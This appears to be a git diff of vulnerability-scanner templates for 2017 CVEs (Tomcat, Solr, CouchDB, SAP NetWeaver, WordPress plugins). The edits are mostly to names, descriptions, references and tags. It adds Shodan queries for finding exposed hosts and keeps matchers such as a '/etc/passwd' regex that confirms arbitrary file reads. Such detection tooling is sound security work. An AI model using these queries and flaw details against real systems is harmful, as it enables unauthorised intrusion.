-  tags: cve,cve2017,apache,rce,tomcat
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
 
 requests:
   - method: PUT
@@ -54,3 +57,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml
index d82f48e3e5..bab23dc8e6 100644
--- a/cves/2017/CVE-2017-12629.yaml
+++ b/cves/2017/CVE-2017-12629.yaml
@@ -4,7 +4,7 @@ info:
   name: Apache Solr <= 7.1 - XML Entity Injection
   author: dwisiswant0
   severity: critical
-  description: "Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr."
+  description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
   reference:
     - https://twitter.com/honoki/status/1298636315613974532
     - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2017-12629
     cwe-id: CWE-611
-  tags: cve,cve2017,solr,apache,oast,xxe
+  tags: oast,xxe,vulhub,cve,cve2017,solr,apache
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml
index 1464250a41..b13092717d 100644
--- a/cves/2017/CVE-2017-12635.yaml
+++ b/cves/2017/CVE-2017-12635.yaml
@@ -4,9 +4,12 @@ info:
   name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation
   author: pikpikcu
   severity: critical
-  description: "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges."
+  description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2017-12635
+    - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
+    - http://web.archive.org/web/20210414010253/https://www.securityfocus.com/bid/101868
+    - https://security.gentoo.org/glsa/201711-16
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml
index 7819d5721c..b604037e5a 100644
--- a/cves/2017/CVE-2017-12637.yaml
+++ b/cves/2017/CVE-2017-12637.yaml
@@ -1,19 +1,21 @@
 id: CVE-2017-12637
 
 info:
-  name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5
+  name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
   author: apt-mirror
   severity: high
-  description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
+  description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
   reference:
-    - https://www.cvedetails.com/cve/CVE-2017-12637/
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
     - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
+    - http://www.sh0w.top/index.php/archives/7/
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-12637
     cwe-id: CWE-22
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
   tags: cve,cve2017,sap,lfi,java,traversal
 
 requests:
@@ -31,3 +33,5 @@ requests:
           - "META-INF"
         condition: and
         part: body
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml
index 206aa791ce..4e18ff6124 100644
--- a/cves/2017/CVE-2017-12794.yaml
+++ b/cves/2017/CVE-2017-12794.yaml
@@ -9,6 +9,8 @@ info:
   reference:
     - https://twitter.com/sec715/status/1406779605055270914
     - https://nvd.nist.gov/vuln/detail/CVE-2017-12794
+    - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/
+    - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2017/CVE-2017-14135.yaml b/cves/2017/CVE-2017-14135.yaml
index 5ec4d962b8..7fdc2e846d 100644
--- a/cves/2017/CVE-2017-14135.yaml
+++ b/cves/2017/CVE-2017-14135.yaml
@@ -4,11 +4,12 @@ info:
   name: OpenDreambox 2.0.0 - Remote Code Execution
   author: alph4byt3
   severity: critical
-  description: "OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py."
+  description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.
   reference:
     - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
     - https://www.exploit-db.com/exploits/42293
     - https://nvd.nist.gov/vuln/detail/CVE-2017-14135
+    - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -16,7 +17,7 @@ info:
     cwe-id: CWE-78
   metadata:
     shodan-query: title:"Dreambox WebControl"
-  tags: cve,cve2017,dreambox,rce,oast
+  tags: cve2017,dreambox,rce,oast,edb,cve
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml
index d10ba2cf19..330df119bb 100644
--- a/cves/2017/CVE-2017-14535.yaml
+++ b/cves/2017/CVE-2017-14535.yaml
@@ -9,12 +9,13 @@ info:
     - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
     - https://www.exploit-db.com/exploits/49913
     - https://nvd.nist.gov/vuln/detail/CVE-2017-14535
+    - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2017-14535
     cwe-id: CWE-78
-  tags: cve,cve2017,trixbox,rce,injection
+  tags: cve,cve2017,trixbox,rce,injection,edb
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml
index 780250d419..66f9cfe5ba 100644
--- a/cves/2017/CVE-2017-14537.yaml
+++ b/cves/2017/CVE-2017-14537.yaml
@@ -4,7 +4,7 @@ info:
   name: Trixbox 2.8.0 - Path Traversal
   author: pikpikcu
   severity: medium
-  description: "Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php."
+  description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
   reference:
     - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
     - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml
index 401d1e3040..c4f88c893d 100644
--- a/cves/2017/CVE-2017-14651.yaml
+++ b/cves/2017/CVE-2017-14651.yaml
@@ -1,7 +1,7 @@
 id: CVE-2017-14651
 
 info:
-  name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
+  name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
   author: mass0ma
   severity: medium
   description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml
index 87a14fe679..c3af2970c4 100644
--- a/cves/2017/CVE-2017-14849.yaml
+++ b/cves/2017/CVE-2017-14849.yaml
@@ -1,14 +1,15 @@
 id: CVE-2017-14849
 
 info:
-  name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
+  name: Node.js <8.6.0 - Directory Traversal
   author: Random_Robbie
   severity: high
-  description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
+  description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
   reference:
     - https://twitter.com/nodejs/status/913131152868876288
     - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
-    - http://www.securityfocus.com/bid/101056
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-14849
+    - http://web.archive.org/web/20210423143109/https://www.securityfocus.com/bid/101056
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -29,3 +30,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15287.yaml b/cves/2017/CVE-2017-15287.yaml
index 144181dec3..916b9a90a9 100644
--- a/cves/2017/CVE-2017-15287.yaml
+++ b/cves/2017/CVE-2017-15287.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2017-15287
     cwe-id: CWE-79
-  tags: cve,cve2017,xss,dreambox
+  tags: dreambox,edb,cve,cve2017,xss
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml
index 1118798c3b..796d80f4f2 100644
--- a/cves/2017/CVE-2017-15363.yaml
+++ b/cves/2017/CVE-2017-15363.yaml
@@ -1,19 +1,22 @@
 id: CVE-2017-15363
 
 info:
-  name: TYPO3 Restler - Arbitrary File Retrieval
+  name: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
+  description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.
   reference:
     - https://www.exploit-db.com/exploits/42985
     - https://www.cvedetails.com/cve/CVE-2017-15363
+    - https://extensions.typo3.org/extension/restler/
+    - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-15363
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-15363
-    cwe-id: CWE-98
-  tags: cve,cve2017,restler,lfi
+    cwe-id: CWE-22
+  tags: cve,cve2017,restler,lfi,edb
 
 requests:
   - method: GET
@@ -35,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml
index f88570d322..c996105f8a 100644
--- a/cves/2017/CVE-2017-15647.yaml
+++ b/cves/2017/CVE-2017-15647.yaml
@@ -1,19 +1,21 @@
 id: CVE-2017-15647
 
 info:
-  name: FiberHome - Directory Traversal
+  name: FiberHome Routers - Local File Inclusion
   author: daffainfo
   severity: high
-  description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
+  description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
   reference:
     - https://www.exploit-db.com/exploits/44054
     - https://www.cvedetails.com/cve/CVE-2017-15647
+    - https://blogs.securiteam.com/index.php/archives/3472
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-15647
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-15647
     cwe-id: CWE-22
-  tags: cve,cve2017,lfi,router
+  tags: lfi,router,edb,cve,cve2017
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml
index 52ffeccdfc..9f941c774b 100644
--- a/cves/2017/CVE-2017-15715.yaml
+++ b/cves/2017/CVE-2017-15715.yaml
@@ -1,19 +1,21 @@
 id: CVE-2017-15715
 
 info:
-  name: Apache Arbitrary File Upload
+  name: Apache httpd <=2.4.29 - Arbitrary File Upload
   author: geeknik
   severity: high
-  description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could
-    be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
+  description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in <FilesMatch>, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+    - http://www.openwall.com/lists/oss-security/2018/03/24/6
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-15715
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2017-15715
     cwe-id: CWE-20
-  tags: cve,cve2017,apache,httpd,fileupload
+  tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
 
 requests:
   - raw:
@@ -44,3 +46,5 @@ requests:
       - type: dsl
         dsl:
           - 'contains(body_2, "{{randstr_1}}")'
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index ffbe9d78c8..48d1b07c67 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
@@ -14,7 +14,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2017-15944
-  tags: cve,cve2017,rce,vpn,panos,globalprotect
+  tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect
 
 requests:
   - raw:
diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml
index 1e252161ac..56a9e56ab6 100644
--- a/cves/2017/CVE-2017-16806.yaml
+++ b/cves/2017/CVE-2017-16806.yaml
@@ -4,16 +4,18 @@ info:
   name: Ulterius Server < 1.9.5.0 - Directory Traversal
   author: geeknik
   severity: high
-  description: "Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs."
+  description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
   reference:
     - https://www.exploit-db.com/exploits/43141
     - https://nvd.nist.gov/vuln/detail/CVE-2017-16806
+    - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
+    - https://www.exploit-db.com/exploits/43141/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2017-16806
     cwe-id: CWE-22
-  tags: cve,cve2017,ulterius,traversal
+  tags: cve2017,ulterius,traversal,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml
index 6e6dae4f21..af409d474a 100644
--- a/cves/2017/CVE-2017-16877.yaml
+++ b/cves/2017/CVE-2017-16877.yaml
@@ -1,12 +1,14 @@
 id: CVE-2017-16877
 
 info:
-  name: Nextjs v2.4.1 LFI
+  name: Nextjs <2.4.1 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
+  description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.
   reference:
     - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
+    - https://github.com/zeit/next.js/releases/tag/2.4.1
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-16877
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -31,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml
index 4f4eeac75f..e50a8de23b 100644
--- a/cves/2017/CVE-2017-17043.yaml
+++ b/cves/2017/CVE-2017-17043.yaml
@@ -1,18 +1,21 @@
 id: CVE-2017-17043
 
 info:
-  name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+  description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
   reference:
+    - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/
+    - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt
+    - https://wpvulndb.com/vulnerabilities/8964
     - https://nvd.nist.gov/vuln/detail/CVE-2017-17043
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-17043
     cwe-id: CWE-79
-  tags: cve,cve2017,wordpress,xss,wp-plugin
+  tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml
index c49c222a32..a2e97ad00d 100644
--- a/cves/2017/CVE-2017-17059.yaml
+++ b/cves/2017/CVE-2017-17059.yaml
@@ -1,19 +1,20 @@
 id: CVE-2017-17059
 
 info:
-  name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+  description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
   reference:
     - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+    - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
     - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-17059
     cwe-id: CWE-79
-  tags: cve,cve2017,wordpress,xss,wp-plugin
+  tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress
 
 requests:
   - method: POST
@@ -37,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml
index 57ff8ab681..643729ab6e 100644
--- a/cves/2017/CVE-2017-17451.yaml
+++ b/cves/2017/CVE-2017-17451.yaml
@@ -1,18 +1,21 @@
 id: CVE-2017-17451
 
 info:
-  name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+  name: WordPress Mailster <=1.5.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+  description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
   reference:
+    - https://wordpress.org/plugins/wp-mailster/#developers
+    - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html
+    - https://wpvulndb.com/vulnerabilities/8973
     - https://nvd.nist.gov/vuln/detail/CVE-2017-17451
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-17451
     cwe-id: CWE-79
-  tags: cve,cve2017,wordpress,xss,wp-plugin
+  tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 5ae1957e4b..2bb55101ff 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -1,20 +1,23 @@
 id: CVE-2017-17562
 
 info:
-  name: Embedthis GoAhead RCE
+  name: Embedthis GoAhead <3.6.5 - Remote Code Execution
   author: geeknik
   severity: high
-  description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
+  description: |
+    description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
   reference:
     - https://www.elttam.com/blog/goahead/
     - https://github.com/ivanitlearning/CVE-2017-17562
     - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
+    - https://github.com/embedthis/goahead/issues/249
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-17562
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2017-17562
     cwe-id: CWE-20
-  tags: cve,cve2017,rce,goahead,fuzz
+  tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub
 
 requests:
   - raw:
@@ -95,12 +98,13 @@ requests:
     matchers-condition: and
     matchers:
 
+      - type: word
+        words:
+          - "environment variable"
+          - "display library search paths"
+        condition: and
+
       - type: status
         status:
           - 200
-
-      - type: word
-        condition: and
-        words:
-          - "environment variable"
-          - "display library search paths"
\ No newline at end of file
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml
index f10df9314d..dc40bd3e87 100644
--- a/cves/2017/CVE-2017-18024.yaml
+++ b/cves/2017/CVE-2017-18024.yaml
@@ -1,10 +1,10 @@
 id: CVE-2017-18024
 
 info:
-  name: AvantFAX 3.3.3 XSS
+  name: AvantFAX 3.3.3 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
+  description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
   reference:
     - https://hackerone.com/reports/963798
     - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2017-18024
     cwe-id: CWE-79
-  tags: cve,cve2017,xss,avantfax
+  tags: avantfax,hackerone,packetstorm,cve,cve2017,xss
 
 requests:
   - raw:
@@ -42,3 +42,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml
index d1ff0a60e6..4d105ea3b9 100644
--- a/cves/2017/CVE-2017-18536.yaml
+++ b/cves/2017/CVE-2017-18536.yaml
@@ -1,18 +1,20 @@
 id: CVE-2017-18536
 
 info:
-  name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+  description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+    - https://wordpress.org/plugins/stop-user-enumeration/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18536
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2017-18536
     cwe-id: CWE-79
-  tags: cve,cve2017,wordpress,xss,wp-plugin
+  tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin
 
 requests:
   - method: GET
@@ -34,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2017/CVE-2017-18598.yaml b/cves/2017/CVE-2017-18598.yaml
index 0c72ce02d6..974e3f8bae 100644
--- a/cves/2017/CVE-2017-18598.yaml
+++ b/cves/2017/CVE-2017-18598.yaml
@@ -1,35 +1,37 @@
-id: CVE-2017-18598
+id: CVE-2017-18598
 
-info:
-  name: Qards Plugin - Stored XSS and SSRF
-  author: pussycat0x
-  severity: medium
-  description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
-  reference:
-    - https://wpscan.com/vulnerability/8934
-    - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
-  tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
-
+info:
+  name: WordPress Qards - Cross-Site Scripting
+  author: pussycat0x
+  severity: medium
+  description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.
+  reference:
+    - https://wpscan.com/vulnerability/8934
+    - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
+    - https://wpvulndb.com/vulnerabilities/8934
